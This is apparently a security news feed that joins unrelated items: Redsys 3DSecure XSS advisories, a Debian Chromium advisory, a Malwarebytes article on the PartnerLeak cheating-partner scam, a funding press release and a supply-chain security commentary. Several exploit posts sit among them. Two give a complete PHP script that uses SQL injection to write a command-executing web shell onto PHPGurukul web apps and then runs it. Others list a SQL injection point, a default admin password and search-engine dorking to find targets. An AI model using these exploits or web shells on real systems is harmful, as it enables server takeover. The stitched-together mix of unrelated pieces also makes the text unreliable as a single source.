Multiple reflected cross site scripting vulnerabilities exist in the 3DS Authorization Challenge of 3DSecure version 2.0. These flaws allow attackers to inject arbitrary web scripts, CSS, or HTML through the manipulation of the params parameter in the request URL.

    Product: 3DSecure 2.0Manufacturer: RedsysAffected Version(s): 3DSecure 2.0 3DS Authorization ChallengeTested Version(s): 3DSecure 2.0 3DS Authorization ChallengeVulnerability Type: Cross-Site Scripting (XSS)Risk Level: MediumSolution Status: Not yet fixedManufacturer Notification: 2024-01-17Solution Date: N/APublic Disclosure: 2024-09-17CVE Reference: CVE-2024-25283Overview:Multiple reflected Cross-Site Scripting (XSS) vulnerabilities exist in the 3DS Authorization Challenge of 3DSecure 2.0. These flaws allow attackers to inject arbitrary web scripts, CSS, or HTML through the manipulation of the params parameter in the request URL.Vulnerability Details:The params parameter in the 3DS Authorization Challenge is vulnerable to code injection. This flaw occurs because the value entered into the parameter is not sanitized, allowing attackers to create new HTML elements in the DOM and execute malicious code in the victim's browser.Proof of Concept (PoC):An attacker can alter the base64-encoded params parameter in the request URL to inject arbitrary code. Example:https://[REDACTED]/[REDACTED]/rest/online/[REDACTED]/redirect?action=challenge&txn=[REDACTED]&params=[REDACTED]"References:OWASP Web Security Testing Guide: Reflected Cross-Site ScriptingDiscoverer:Reported by Rubén López Herrera________________________________Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição

3DSecure 2.0 3DS Authorization Challenge Cross Site Scripting

3DSecure version 2.0 is vulnerable to cross site scripting in its 3DSMethod Authentication. This vulnerability allows remote attackers to hijack the form action and change the destination website via the params parameter, which is base64 encoded and improperly sanitized.

    Product: 3DSecure 2.0Manufacturer: RedsysAffected Version(s): 3DSecure 2.0 3DS Method AuthenticationTested Version(s): 3DSecure 2.0 3DS Method AuthenticationVulnerability Type: Cross-Site Scripting (XSS)Risk Level: MediumSolution Status: Not yet fixedManufacturer Notification: 2024-01-17Solution Date: N/APublic Disclosure: 2024-09-17CVE Reference: CVE-2024-25282Overview:3DSecure 2.0 is vulnerable to Cross-Site Scripting (XSS) in its 3DSMethod Authentication. This vulnerability allows remote attackers to hijack the form action and change the destination website via the params parameter, which is base64 encoded and improperly sanitized.Vulnerability Details:The issue arises because the params parameter in the 3DSMethod Authentication is not properly sanitized or validated before being processed. Attackers can inject arbitrary HTML elements into the DOM, modifying the website's appearance or executing malicious code in the victim's browser. Additionally, the integrity of the base64-encoded information is not checked, making it vulnerable to manipulation in a man-in-the-middle attack.Proof of Concept (PoC):By altering the params parameter in the request URL, an attacker can modify base64-encoded values and inject malicious code. For example:https://[REDACTED]/[REDACTED]/rest/online/[REDACTED]/redirect?action=challenge&txn=[REDACTED]&params=[REDACTED]"Solution:Currently, no solution is available. Redsys has been notified of the issue, but no patch has been released as of the date of this advisory.References:OWASP Web Security Testing Guide: Reflected Cross-Site ScriptingDiscoverer:Reported by Rubén López Herrera________________________________Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição

3DSecure 2.0 3DS Method Authentication Cross Site Scripting

Debian Linux Security Advisory 5768-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5768-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonSeptember 11, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-8636 CVE-2024-8637 CVE-2024-8638 CVE-2024-8639Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.0.6613.137-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbiEqwACgkQZF0CR8Nudjd2Pw/9F1tKhXrjmZYdVSLTqsp4FX9J/9cvJH9UP2SmHt3uvmc9cRWJhMNCFZ3mNz8R7Du5yamK+e1lQilcspA9JjEHdD57JWqKu4lk+gXgT3WNwf4QcOJESfcyh8rBoznoXLceYZQ0skK1Szf2QY8v/qOssnpdH815AcFyWrSxY4Jr6am7Ya+cLS9d9Yf5AgfcFmc3JNzL3Wdf8CZojp6VctSvpbc/fCLCVf3+i/x57DUuPFme00UYXSWO7Cm/ZxIyNvRoEF9h4/BEUt83l9bBhWjpbvAKQxSMdtFqhoY0DauThAOzcqadymnl40PgAZ+Re3Y0gxx3h8MFCTx+E/C6QaqLrSyySALxrZRt73Yh4kt2iZLc7N7hXiFz41SOJ8YQP+BlkLb4tLv0AMpTPFdrVA3iKRrHnIJAyfI3pd5FHcujd2e8BcEk582fEtQy8WCJt2KqZv56+Taz/YWKEnRG0hB40iqShcHwPj9SZCGU7eweT+/od/UPOazDeM1m2ecMgVWQieDhFTBIpmc2/m2F+N+DUz3lIK/7q1PzKrhQ5IQqDQsxlEzi914OZoKj8DN1tog4DcmHu4kdiD2kFVA4c3Vyer/KLlVC9vF1mDP52ZSDWfaPJJuD9yEkEHpHowj8giZZOCQ8nfiXPa+hEFgiWFi2OoTXbcIePifAfnDhT7tiZm0==AWwj-----END PGP SIGNATURE-----

Debian Security Advisory 5768-1

We dug into PartnerLeak, the site behind the "your partner is cheating on you" emails, including how and where the scammers get their information.

Earlier this week, we reported on a new type of scam that tells you your partner is cheating on you. However, we hit a dead end because we were unable to get hold of an original copy of the email.

That was until the scammers were “kind enough” to send one to one of our co-workers.

your partner is cheating on you and we have proof

> “Hi (target’s name\],
> 
> \[Partner’s name\] is cheating on you. Here is proof.
> 
> As a company engaged in cyber security we’ve found information related to \[partner’s name\] that might interest you.
> 
> We made a full backup of \[his/her\] disk. (We have all \[his/her\] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all \[his/her\] contacts) and are willing to give you a full access to this data. For more details visit our website.”

With this, we were able to investigate the scammers’ intentions.

All three of the links in the email (Here, website, and Check now) point to the same website. Through a landing page located at click\[.\]cardfoolops\[.\]com visitors are redirected to partnerleak\[.\]com.

The partnerleak\[.\]com domain was registered on August 1, 2024, with NameCheap anonymously. Anonymous registration doesn’t automatically mean the person registering is up to no good, but it did block us from researching this avenue any further.

The registration date, however, matches with the first complaints we started seeing about these emails.

Malwarebytes blocks partnerleak\[.\]com

During the redirection process, your email address is passed on, which means when you register at the site your email address is already filled out.

Email address is transmitted and pre-filled

The PartnerLeak site itself says it offers anonymity, as well as “crucial insights” into the behaviour of the one you love.

> “completely anonymous service leverages artificial intelligence and the vulnerabilities of popular smartphones to provide crucial insights into your partner’s behavior.”

> “**Are You Concerned About Your Partner’s Honesty?**
> 
> If you’ve decided to take a leap into a relationship but find yourself questioning your partner’s honesty, or if you’ve been together for a while and something feels off, we have a solution for you.
> 
> **Our Service**
> 
> Our completely anonymous service leverages artificial intelligence and the vulnerabilities of popular smartphones to provide crucial insights into your partner’s behavior. Here’s how it works:
> 
> Data Backup Access: You can download a backup from iCloud or Google, which includes:
> 
> *   Device location tracking
> *   Movement history with timestamps
> *   Correspondence from popular messaging apps like Telegram, WhatsApp, and iMessage
> *   Photo and video materials stored on the smartphone
> 
> Social Media Analysis: Utilizing AI and extensive data, our service can:
> 
> *   Check user registration and analyze behavior on platforms like Facebook and Twitter
> *   Investigate activity on popular dating apps such as Tinder, AdultFriendFinder, Hinge, and OkCupid
> 
> This comprehensive analysis helps you verify the reliability of your potential partner based on criteria that matter most to you.
> 
> **Commitment to Anonymity and Privacy**
> 
> *   Anonymous Transactions: We prioritize your anonymity by processing payments through cryptocurrencies, ensuring that your partner will remain unaware of your inquiries.
> *   Data Privacy: Your privacy is of utmost importance. We offer the option to permanently delete any data related to you from our system.
> 
> Take control of your relationship concerns today with our discreet and effective service!”

Nowhere on the site does it specify how much such an investigation would cost, but after registration you can start a search at which point it will tell you to top up your balance.

You don’t have free search. Please top up balance or try use different email.

To top up your balance there are three payment options:

*   Credit card
*   Bitcoin
*   Ethereum

We checked the balances on the cryptocurrency accounts they provided and we are happy to report that those are both dead in the water. We can only hope that the PartnerLeak revenue from credit cards looks the same, although that is probably wishful thinking on our part.

An empty and inactive Bitcoin wallet

An equally empty Ethereum account

Our investigation into where the scammers were getting the necessary information always pointed in the same direction: The Knot, a wedding services company.

However, we couldn’t find any breaches of its site or any tangible evidence that it was anything more than just a source of information. Like many other similar sites, it is easy to find a partner name on the site if you already have the name and email of the other partner.

But since many victims, including our co-worker, used The Knot’s services, we contacted them and received this statement from a spokesperson:

> “We were notified of user concerns, and after investigation by our cybersecurity team, determined there is no evidence of unauthorized access to our systems.”

Regardless of where the scammers are getting their data, let’s keep their balance at zero and spread the word.

**How to react to your partner “is cheating on you” emails**

First and foremost, never reply to emails of this kind. That tells the sender that someone is reading the emails sent to that address, and will lead to them trying other ways to defraud you.

*   If the email includes a password, make sure you are not using it any more _on any account_. If you are, change it as soon as possible.
*   If you are having trouble remembering all your passwords, have a look at a password manager.
*   Don’t let yourself get rushed into doing something. Scammers rely on time pressure that leads to people making quick decisions.
*   Do not open unsolicited attachments. Especially when the sender address is suspicious, or even appears to be your own.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 PartnerLeak scam site promises victims full access to &#8220;cheating&#8221; partner&#8217;s stolen data 

Nipah Virus Testing Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/nipah-tms/';// مسار ثابت لرفع الملف$path = 'C:\www\nipah-tms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Nipah Virus Testing Management System 1.0 PHP Code Injection

Medical Card Generations System version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Medical Card Generations System 1.0 Sql injection Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : view-card-detail.php?viewid=1 <==== inject here [+] http://127.0.0.1/mcgs/view-card-detail.php?viewid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Medical Card Generations System 1.0 SQL Injection

Maid Hiring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Maid Hiring Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/mhms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Maid Hiring Management System 1.0 Insecure Settings

Emergency Ambulance Hiring Portal version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/eahp/';// مسار ثابت لرفع الملف$path = 'C:\www\eahp\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Emergency Ambulance Hiring Portal 1.0 PHP Code Injection

Silver Spring, United States, 12th September 2024, CyberNewsWire

**Silver Spring, United States, September 12th, 2024, CyberNewsWire**

The investment will drive the company’s advancement of scalable workload access management for enterprises

Aembit, the leading non-human identity and access management (IAM) company, has secured $25 million in Series A funding, bringing its total capital raised to nearly $45 million. Acrew Capital led the round, with participation from existing investors Ballistic Ventures, Ten Eleven Ventures, Okta Ventures, and CrowdStrike Falcon Fund.

Aembit’s funding comes in the wake of continued high-profile non-human identity attacks on organizations such as Cloudflare, The New York Times, and Microsoft. Non-human identity (NHI) refers to the applications, scripts, and bots that businesses use to automate their operations, as well as the credentials used by NHIs to communicate to sensitive databases, applications, and infrastructure. 

These incidents exposed secrets such as API keys, access tokens, and other non-human access credentials, which were used to penetrate enterprise environments. In a newly published survey of security professionals, Aembit found that most organizations still struggle with managing NHI credentials securely: Over 30% still storing credentials in code, and 23% using email and chat to share credentials. Over 60% of respondents are looking for a comprehensive solution across their entire organization.

Security professionals are recognizing the need for an access-focused approach that automates identity-driven, secretless, centrally enforced, and auditable access between distributed applications and SaaS services to sensitive resources in the cloud and on-premises. 

Aembit has led the market in solving this emerging challenge by pioneering non-human IAM. It enables policy-based access management between workloads and the sensitive resources they access, moving beyond reactive visibility and governance to proactively shrink the attack surface of rapidly growing and highly distributed non-human identities. Aembit was recently lauded as a Top 2 finalist in the prestigious 2024 RSA Innovation Sandbox competition and is a finalist for Best Identity Management Solution at the 2024 SC Awards. Aembit continues to advance access management with capabilities such as MFA-strength conditional access, policy automation via infrastructure-as-code, and robust auditing for NHI access. 

> “Aembit is tackling one of the most pressing challenges in modern enterprise security,” said Mark Kraynak, founding partner at Acrew Capital. “The shift to cloud and SaaS, and AI has driven an order-of-magnitude expansion in non-human identities. With the proliferation of microservices and APIs across diverse environments, IAM has become the critical first line of defense for protecting sensitive data. Legacy access management approaches weren’t designed with this level of scale and automation in mind. We are thrilled to be partnering with Aembit to bring a new approach to the market.”

Co-Founders David Goldschlag and Kevin Sapp have spent their careers innovating across the identity landscape, most recently creating New Edge Labs (acquired by Netskope), one of the first user zero trust products on the market.

> “Kevin and I founded Aembit with a vision to help enterprises secure access between non-human workloads, applications, and software resources with the same principles used today to secure human access,” said David Goldschlag, co-founder and CEO of Aembit. “Talking to hundreds of enterprises, and working closely with design partners, our approach centers on proactively securing access between non-human identities, while eliminating friction for developers and security teams.”

> “By solving non-human IAM, Aembit is tackling an essential security challenge,” said Brad Jones, CISO at Snowflake and an Aembit customer. “Not only is their approach to non-human access innovative, but Aembit is a provider we can rely on.”

The Aembit Workload IAM Platform enforces secure access between non-human workloads and the services that authorize access to sensitive data and infrastructure. Aembit’s policy engine grants secretless access, just-in-time, based on the workload’s identity and posture. 

Leveraging native identities and sophisticated automation, organizations use Aembit to eliminate storage of sensitive secrets within applications or vaults by moving to short-lived access tokens with a no-code auth approach. With Aembit, businesses proactively secure non-human access while eliminating the manual and fragmented work required today by security, engineering, and DevSecOps teams.

**About Aembit**

Aembit is the non-human identity and access management platform that secures access between workloads across clouds, SaaS, and data centers. With Aembit’s identity control plane, DevSecOps can fully automate secretless, policy-based, and Zero Trust workload access with MFA-strength capabilities. For more information, users can visit https://aembit.io/ and follow us on LinkedIn.

**Contact**

**CMO**  
**Apurva Davé**  
**Aembit**  
**\[email protected\]**

Aembit Raises $25 Million in Series A Funding for Non-Human Identity and Access Management

Understanding a threat is just as important as the steps taken toward prevention.

Ansh Patnaik, Senior Vice President of Product Management, CyCognito

September 12, 2024

5 Min Read

Source: Zonnar GmbH via Alamy Stock Photo

COMMENTARY

In recent years, software supply chain attacks have moved from the periphery of concerns to the forefront. According to Verizon's "2024 Data Breach Investigations Report," the use of vulnerabilities to initiate breaches surged by 180% in 2023, compared to 2022. Of those breaches, 15% involved a third party or supplier, such as software supply chains, hosting partner infrastructures, or data custodians. 

These statistics come as no surprise, given the impact of several high-profile vulnerabilities in 2023. 

SolarWinds is probably the biggest known example of a software supply chain attack to date. More than 18,000 organizations were affected, with some reports stating the attack cost those affected 11% of their revenue, on average.

Similarly, Okta also experienced a significant breach where threat actors accessed private customer data through its support management system. The breach went undetected for weeks, despite security alerts.

And let's not forget the drawn-out MOVEit Transfer tool attack, which affected more than 620 organizations, including major entities like the BBC and British Airways. Linked to the Cl0p ransomware group, the attack clearly emphasized the urgency of promptly patching vulnerabilities and securing Web-facing applications. 

A very important detail to note is that the ramifications of software supply chain attacks could be enduring, both from a technical threat and liability perspective. In October 2023, nearly three years after the notorious SolarWinds breach, the Securities and Exchange Commission (SEC) charged SolarWinds with misleading investors about its cybersecurity practices and risks. This charge followed a $26 million settlement of a securities class-action lawsuit related to the breach.

But to understand how these attacks occur and how they can be mitigated, it's important to first understand what software supply chain security is.

**Unpacking Software Supply Chain Security**

Gartner defines software supply chain security (SSCS) as a comprehensive framework encompassing the processes and tools necessary to curate, create, and consume software securely, thereby mitigating potential attacks on software or its use as an attack vector. This framework is structured around three core pillars:

1.  Curation: This step is all about evaluating third-party software components to assess their risks and determine if they're suitable for use. By doing this, organizations ensure that only secure and compliant components make their way into the software supply chain.
    
2.  Creation: This shows the importance of secure development practices and protecting both software artifacts and the development pipeline. It involves putting security measures in place throughout the software creation process to guard against vulnerabilities and potential threats.
    
3.  Consumption: This stage focuses on ensuring the integrity of the software by verifying its source, authenticity, and traceability. It ensures that the software being deployed is secure and has not been tampered with or modified without authorization.
    

In simpler terms, SSCS encompasses all the software components used and built into an organization's software, as well as the practices developers employ to write and monitor code post-deployment.

Gartner's efforts in this area are a direct result of what it deems to be an escalating threat. In fact, it projects that the financial impact of supply chain attacks will escalate from $40 billion in 2023 to $138 billion by 2031.

The US government is also taking measures, mandating that its suppliers provide a software bill of materials (SBOM), underscoring the need for transparency and accountability in the software supply chain.

**Building a Software Supply Chain Security Program**

Managing the risk of vulnerabilities during software development relies on two main processes: continuous code scanning throughout the software development life cycle (SDLC) and maintaining a highly automated SDLC to efficiently update, test, and deploy new software versions.

*   Continuous code scanning: It's crucial to implement continuous code scanning throughout the SDLC to catch vulnerabilities early. This involves using both static and dynamic application security testing (SAST and DAST) to ensure that both proprietary and third-party code are secure.
    
*   Automated SDLC: Keeping the SDLC highly automated is key to efficiently updating, testing, and deploying new software versions. Automation helps reduce human error and speeds up the process of identifying and fixing vulnerabilities.
    

Scanning third-party code with source code analysis (SCA) tools is essential in this context. SCA automates the detection and management of risks associated with third-party and open source software components. Here's what SCA can do:

*   Identify software components: SCA tools can pinpoint all the components within a software application, giving you a clear view of the software supply chain.
    
*   Generate software bills of materials (SBOM): SBOMs provide a list of all components and their metadata, helping organizations comply with regulatory requirements and manage open source licenses.
    
*   Scan for vulnerabilities: These tools scan for known vulnerabilities in software components, offering alerts and guidance for remediation.
    
*   Assess risks: They evaluate the risk level of each component, allowing organizations to prioritize remediation efforts based on the severity of the risk.
    
*   Generate dependency graphs: These graphs show the relationships between components, helping to identify potential points of failure or risk.
    
*   Provide remediation guidance: SCA tools offer actionable advice on how to fix identified vulnerabilities.
    
*   Automatically enforce policies: You can set policies to automatically block the use of components with known vulnerabilities or license issues.
    

External exposure management is also playing an increasingly critical role in supply chain security, with organizations adding more third-party services and building more Web apps using third-party components and libraries every day.

**The Future**

The financial impact of these attacks is projected to grow significantly, making it imperative for organizations to act now. 

The key moving forward is first awareness. Understanding the threat is as important as the steps toward prevention. Once this is established, there are ample resources and technologies to equip security teams with the reinforcements to protect their ecosystems.

**About the Author**

Senior Vice President of Product Management, CyCognito

Ansh Patnaik, senior vice president of product management of CyCognito, has more than 20 years of cross functional experience in cybersecurity and data analytics. Most recently, Ansh was director, cloud security products for Google Cloud Platform, and chief product officer for Chronicle, prior to the acquisition of Chronicle by Google. Previously, he was vice president of product management at Oracle Cloud, where he defined and launched its security analytics cloud service offering. Ansh has held product management, product marketing, and sales engineering leadership roles at several market leading software companies, including Delphix, ArcSight (acquired by HP), and BindView (acquired by Symantec).

Tag

#auth